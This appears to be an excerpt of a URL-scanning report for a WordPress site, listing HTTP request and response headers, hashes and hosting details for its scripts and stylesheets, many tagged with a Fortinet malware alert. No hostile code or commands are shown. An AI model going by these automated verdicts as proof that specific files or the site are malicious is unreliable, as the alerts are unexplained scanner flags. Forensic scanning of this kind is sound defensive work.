TE: trailers
HTTP/2 200 OK
last-modified: Thu, 30 Jul 2020 07:04:10 GMT
etag: "14013b1-654-5aba3476e8e80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 460
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.4.2
72.167.59.18 200 OK 625 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1147)
Hash c7da7c1b46ca9b6599ec9002dc45d84a
a37ffbba8290f68c0b10ed966338b12adf31d11a
50d95fb57caba95daa487939cedc601ceaec590f404293e6f9edf6ad907d1820
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/pixelyoursite/dist/scripts/jquery.bind-first-0.2.3.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 Aug 2020 07:05:01 GMT
etag: "156063d-526-5abf3c1d64140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 625
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.9.7
72.167.59.18 200 OK 618 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 6bae03589cb890edb67c1875a1152133
25ed8aa72122a4fd604703664f44c642090ecfc6
facb1cabf2da17e3cc62d8c8fb17979e3be1cbb823bc13dbef1b3a168e85538b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/browser-redirect.js?ver=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "1561717-9f9-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 618
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3
72.167.59.18 200 OK 832 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1709)
Hash 2f885ec90da398ab8d4ea7c908b532a4
e3c300694c4e79aae8bc0b3a4c1ef0e235aec87c
3f7f9ae1a7e0c7367c4864eccdf867a2a5d5371806f74029d48cf3a1c5b8c153
GET /wp-content/plugins/pixelyoursite/dist/scripts/js.cookie-2.1.3.min.js?ver=2.1.3 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 Aug 2020 07:05:01 GMT
etag: "156063e-6d7-5abf3c1d64140-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 832
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.1.9.7
72.167.59.18 200 OK 237 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash ca808d973d37154d6dad92a246e7c7bb
dd6850124ea497a275c5a4d1f8e0bf438bd0dfae
fac0f38bfbd87190178ef9bb0011f6acad4bcfc6ee73342b00700779b1e9f5ca
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/language-selector.js?ver=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "156171f-44f-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 237
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/selectric.css?ver=1.0
72.167.59.18 200 OK 887 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/selectric.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 7214a5b4d8e49e23d88d33d7bd0c837d
58f8f7c08b6dc857b9f04fbef0de5786fb3c3bdd
aa5a1f31f57b4b3e7aff70fc38a358880454e457a3a8b3fde7c3ca26ecd7c7bd
GET /wp-content/themes/prodigy/assets/css/selectric.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eba-d86-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 887
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/elastic-slider.css?ver=1.0
72.167.59.18 200 OK 782 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/elastic-slider.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 1171c05c450f7c3298463e885ffea7dc
62b749898765023aae183602018813db2e87b899
5196540816a1490d0fae89163f74a41c8728c77e1829b760e43e043f58a13542
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/elastic-slider.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb5-cad-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 782
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy-child/style.css?ver=5.4.2
72.167.59.18 200 OK 2.0 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy-child/style.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (309)
Hash 87991ee39884a4cfa13dc40320b6d387
8a399b2a4d8f2d490d9621fdcd7fcfd17d3305ea
e75636ccf5419b870a5402b322012b53d5956de1997d5be554937dc559e91f74
GET /wp-content/themes/prodigy-child/style.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 12 Mar 2019 08:19:33 GMT
etag: "1043e17-1a4b-583e159524f40-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1975
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
72.167.59.18 200 OK 3.8 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (9959)
Hash 64058b5c90087e60ed2b342c1d18fcd3
a394e8d8379db2385e0708ecfc5e6d5808d3a73c
0e89b20002741f049bb2e8391164783a67e89ce1cf8c2646a7417e20b8fb5cce
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 20 May 2016 06:11:28 GMT
etag: "158126a-2748-5333ff613c400-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 3826
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/adjust.css?ver=1.0
72.167.59.18 200 OK 2.8 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/adjust.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 68d6e51b0d09b5114883d0d1833ec271
3a4b2a9817b37882165b785c75d36dd1168bc64a
7267285e57c87f4a6b411e175951de93a4b1723be2d3d94a72961b5cf133593a
GET /wp-content/themes/prodigy/assets/css/adjust.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eab-44ff-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2783
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.9.7
72.167.59.18 200 OK 976 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 0ea878e44791390de12d5f7aef0276b1
612ca6a5a04bfc0a3d548586a54b723249fa1b69
7262e18d2c5b37c6d45f3d78b21d4c627d00a00e0dd6108a81e640a24b4adaf9
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/js/jquery.cookie.js?ver=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:58 GMT
etag: "156171e-b01-51d8b6fdd7f80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 976
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/superslides.css?ver=1.0
72.167.59.18 200 OK 986 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/superslides.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash f21feeaf2ae602a243273616d440c9c6
8112435e10aa3cc8ac9e2ed05ea30139117ed163
3623436bb1db840738ab7d7a4f6cbd628baa46f1b46af49c4d62891a7acaa96d
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/superslides.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "12c0ebc-ea9-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 986
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
72.167.59.18 200 OK 2.4 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (6614)
Hash c020107bdd35ee5a19785eb1d9c025fb
237a54a9dcd23e1d2e2b658e8b9f7dddedb59387
c56c58845936caea731e4e7e49888555695aa57d0774500739ab9a69a9cb212c
GET /wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 05 Oct 2019 22:01:04 GMT
etag: "158129e-1ab6-59430f471e800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2411
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1
72.167.59.18 200 OK 3.7 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 0dda35cfb3d24663b1bd3c072540183d
1717c573205edc2d9186f668cdeb310a8394c491
2895b624b4cac02ff107ca50ba188c3024fa8816f19e3dc61060f324d73e4a97
GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.2.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 06 Aug 2020 07:04:43 GMT
etag: "15410fe-3719-5ac301a49b8c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 3658
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.12.2
72.167.59.18 200 OK 2.6 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.12.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1022)
Hash d19bfc673a0302c927c2292e6beebad3
e1369273d693be64c762c60d95c95fbc0365b673
ff245e552924917ee1b77b771685dd970027c66d8f8cfde2184622c6d891022c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.12.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 11 Aug 2020 07:05:50 GMT
etag: "15600c1-2452-5ac94b37cef80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 2560
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12
72.167.59.18 200 OK 5.9 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (27230)
Hash 742b6e006f6926f9ce1e61c6c3cafc40
2334ae07b08d3fd83af6fb5731cbd870309e2ac3
51da9f34ec2cc3e90177b37e446d3863fa9488ec211ed723aff29f4b5376803b
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jun 2016 20:17:36 GMT
etag: "1560375-6b00-534b5e13ab800-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 5917
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/custom_google_maps.js?ver=1
72.167.59.18 200 OK 745 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/custom_google_maps.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash f031b9016d51108a254e7027e0b178a7
d8277921e1c7940714c5680a390ae453925507a1
baf29ac239984f8e6dc0dd50c2530219654b94cf826636a46fc9217d8e1497f2
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/custom_google_maps.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216cf-2867-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 745
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/comment-reply.min.js?ver=5.4.2
72.167.59.18 200 OK 1.0 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/comment-reply.min.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (2385)
Hash 3d19075f5ff4f72373bab47b9035d6dd
f905ed08c8ab6569dab8feb280a1e2abf5c3443c
b9e6e65fb33b83eccbb24fc75b057797af3359b0320e7e92d537aa986e9e64b0
GET /wp-includes/js/comment-reply.min.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 11 Nov 2019 11:51:03 GMT
etag: "1021f9c-974-59710befbd7c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1042
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/scroll-anims.js?ver=1
72.167.59.18 200 OK 874 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/scroll-anims.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 11e9dba05241fb5442dbff7c9bd020ff
9b8a289dc949de18903f053501ee3c95f68fa353
0aabc188516db5eb78c2e78ac3027fae549b39de5988a2519ba27efa87fa356f
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/scroll-anims.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216e3-e3a-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 874
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17
72.167.59.18 200 OK 543 B URL HTTP/2 www.comm2po.ca/wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1184)
Hash f9d7cdf3162a58ed0bd2d474aec60f56
8494735a7a4ec38064540375cc76a44a480ff844
266f78067d7b997e4000550737bce236dda6291e3c521ab46cffa9297f7104b7
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 24 Mar 2020 10:05:19 GMT
etag: "1581212-4c3-5a196e39655c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 543
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/customizer.js?ver=5.4.2
72.167.59.18 200 OK 217 B URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/customizer.js?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash e0e6d086726c31b90a381a4535c13d15
b3d4b10655da8810e7bcf3a7bdeedacc75bdc81e
b470ff109e8d48653414862668478ffc406ea3c870fb10e5639a76173e0edac6
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/customizer.js?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216d0-292-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 217
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0
72.167.59.18 200 OK 1.5 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (1512)
Hash 90416410a4069570c7223648f05eb723
cddc15792235b58362dc502ecc8fd7de3a0c1351
3e4ea8724831d0250f57134b7613786c04c140de174d60d013c07da9f281b918
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:54 GMT
etag: "12c0eb6-1b9b-552f902fca780-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1535
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/css/fotorama.css?ver=1.0
72.167.59.18 200 OK 2.5 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/css/fotorama.css?ver=1.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with very long lines (14151)
Hash 5cc664e6623f8376a924a6dfe1eaa803
52ffa3bafecae1a6105b4da9b74923ae04ee35aa
3ef48520a5c9b3be0bfcfd64798231fe45769eabcce33e38fce9e74a1d0a1ae1
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/css/fotorama.css?ver=1.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
